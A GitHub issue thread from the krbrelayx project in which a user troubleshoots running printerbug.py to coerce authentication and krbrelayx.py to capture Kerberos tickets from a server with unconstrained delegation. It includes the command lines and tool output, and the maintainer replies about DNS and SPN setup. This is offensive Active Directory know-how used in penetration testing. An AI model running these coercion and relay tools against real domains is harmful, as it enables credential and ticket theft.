### ISSUE TITLE
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE while executing printerbug.py script

### ISSUE THREAD

**Issue by igotunj** [dirkjanm/krbrelayx#5]
Hello,

I'm getting the following error with one of the server with unconstrained delegation. Check and confirmed that RPC is started and running on the server. Tried switching off the firewall as well.

# python printerbug.py -hashes <NTLM> domain/machine account$@hostname test.domain
[*] Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Attempting to trigger authentication via rprn RPC at <server hosttname>
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked

# python krbrelayx.py -aesKey <<key>>
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk)
[*] Setting up SMB Server

[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 192.168.0.1
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 192.168.0.1

Could you please guide me like what could be wrong. Is it something related to the impacket version i'm using.

**Comment by dirkjanm** [comment]
It connects back with NTLM, which indicates a problem with Kerberos. Are you connecting it to a hostname that exists in DNS and has a serviceprincipalname assigned?

**Comment by igotunj** [comment]
Yes I'm connecting it to hostname that exists in DNS, but it doesn't have a SPN as the script was run from my test machine(kali) which is not added as an computer object in AD

**Comment by dirkjanm** [comment]
I don't know whats up here but I can't really provide support with this limited info. This doesn't look like an issue with the tool so I'm closing this.

**Comment by igotunj** [comment]
Thanks for all your support, actually I was doing something wrong with my
setup.
